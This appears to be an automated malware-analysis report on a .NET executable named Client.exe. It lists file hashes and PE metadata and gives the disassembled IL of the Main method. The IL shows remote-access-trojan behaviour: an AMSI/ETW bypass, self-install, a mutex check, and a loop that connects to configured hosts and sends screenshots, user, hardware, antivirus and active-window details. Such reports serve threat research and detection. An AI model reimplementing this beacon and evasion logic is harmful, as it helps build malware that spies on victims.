3d4fd69e3b6234e425a1842e004e88c1
PE Executable | MD5: 3d4fd69e3b6234e425a1842e004e88c1 | Size: 185.34 KB | application/x-dosexec
Symbol Ofbuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 3d4fd69e3b6234e425a1842e004e88c1
|
| Sha1 | 3535ded36d22de1139c3edf6e05993877f1bdb2f
|
| Sha256 | edb9d3673a7a5bc9267794fdbf16ab4d551e129aa37d77510bf676352abcc1a7
|
| Sha384 | 734ab2b728f181b8fbb7336af7f88a237e0c46efe0e0b368ac79eb93976be64623784b0e3cc1d436c060605633bc562d
|
| Sha512 | 004f95dd4b746f0eef85a9d99ca096da88c33bf7d826fc15e4ce7d4e5cfbfbb0ab723e6defa796d65a55e2c58f4737bcd6b699f5258b46c16af8a3f0b6d59403
|
| SSDeep | 3072:sJ0dSpTEiA/qfPUbuulJkVrjmK9rigDpABAyHGYvgbUi3i3rHCCWpyOblednGK5:sJYp/qXsuTVrjL12BZOSLaRbkn
|
| TLSH | 5B04F14673C54935E2AF97FC63B210499234F2B31412E74FBDD69CA865827C5A382ECE
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | Client.exe |
| Full Name | Client.exe |
| EntryPoint | System.Void Client.Program::Main(System.String[]) |
| Scope Name | Client.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | Client |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.0 |
| Total Strings | 288 |
| Main Method | System.Void Client.Program::Main(System.String[]) |
| Main IL Instruction Count | 149 |
| Main IL | call System.Void Client.Config::Init() call System.Void Client.Helper.AsmiAndETW::Bypass() ldsfld System.String Client.Config::Install ldstr e2g1 call System.String Client.Helper.EncryptString::Decode(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0025: ldsfld System.String Client.Config::Mutex call System.Void Client.Helper.Install::Run() ldsfld System.String Client.Config::Mutex call System.Boolean Client.Helper.MutexControl::CreateMutex(System.String) brfalse IL_01A7: leave.s IL_01AC call System.Void Client.Helper.Methods::MaxPriority() call System.Void Client.Helper.Methods::PreventSleep() ldsfld Client.Helper.Client Client.Program::client ldfld System.Boolean Client.Helper.Client::itsConnect brtrue IL_0198: ldc.i4 200 ldsfld System.String Client.Config::Hosts ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 59 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.0 <null> ldloc.0 <null> ldsfld System.Random Client.Helper.Methods::random ldloc.0 <null> ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.1 <null> ldloc.1 <null> ldc.i4.1 <null> ldelem.ref <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.2 <null> ldsfld Client.Helper.Client Client.Program::client callvirt System.Void Client.Helper.Client::Disconnect() ldsfld Client.Helper.Client Client.Program::client ldloc.1 <null> ldc.i4.0 <null> ldelem.ref <null> ldloc.2 <null> ldsfld System.Random Client.Helper.Methods::random ldloc.2 <null> ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> callvirt System.Void Client.Helper.Client::Connect(System.String,System.String) ldsfld Client.Helper.Client Client.Program::client ldfld System.Boolean Client.Helper.Client::itsConnect brfalse IL_0198: ldc.i4 200 ldsfld Client.Helper.Client Client.Program::client ldsfld Client.Helper.Client Client.Program::client newobj System.Void Client.Helper.PingChecker::.ctor(Client.Helper.Client) stfld Client.Helper.PingChecker Client.Helper.Client::pingChecker ldsfld Client.Helper.Client Client.Program::client ldsfld Client.Helper.Client Client.Program::client newobj System.Void Client.Helper.LastPing::.ctor(Client.Helper.Client) stfld Client.Helper.LastPing Client.Helper.Client::lastPing ldsfld Client.Helper.Client Client.Program::client ldc.i4.s 14 newarr System.Object dup <null> ldc.i4.0 <null> ldstr uk<<1;e call System.String Client.Helper.EncryptString::Decode(System.String) stelem.ref <null> dup <null> ldc.i4.1 <null> call System.Byte[] Client.Helper.Methods::CaptureResizeReduceQuality() stelem.ref <null> dup <null> ldc.i4.2 <null> ldsfld System.String Client.Config::Group stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String Client.Config::Hwid stelem.ref <null> dup <null> ldc.i4.4 <null> call System.String System.Environment::get_UserName() ldstr CxC call System.String Client.Helper.EncryptString::Decode(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String Client.Config::Camera stelem.ref <null> dup <null> ldc.i4.6 <null> ldsfld System.String Client.Config::Cpu stelem.ref <null> dup <null> ldc.i4.7 <null> ldsfld System.String Client.Config::Gpu stelem.ref <null> dup <null> ldc.i4.8 <null> ldsfld System.String Client.Config::WindowsVersion stelem.ref <null> dup <null> ldc.i4.s 9 ldsfld System.String Client.Config::AntiVirus stelem.ref <null> dup <null> ldc.i4.s 10 ldsfld System.String Client.Config::Version stelem.ref <null> dup <null> ldc.i4.s 11 ldsfld System.String Client.Config::DataInstall stelem.ref <null> dup <null> ldc.i4.s 12 ldsfld System.String Client.Config::Privilege stelem.ref <null> dup <null> ldc.i4.s 13 call System.String Client.Helper.Methods::GetActiveWindowTitle() stelem.ref <null> call System.Byte[] Leb128.LEB128::Write(System.Object[]) callvirt System.Void Client.Helper.Client::Send(System.Byte[]) ldc.i4 200 call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_003E: ldsfld Client.Helper.Client Client.Program::client leave.s IL_01AC: ret pop <null> leave.s IL_01AC: ret ret <null> |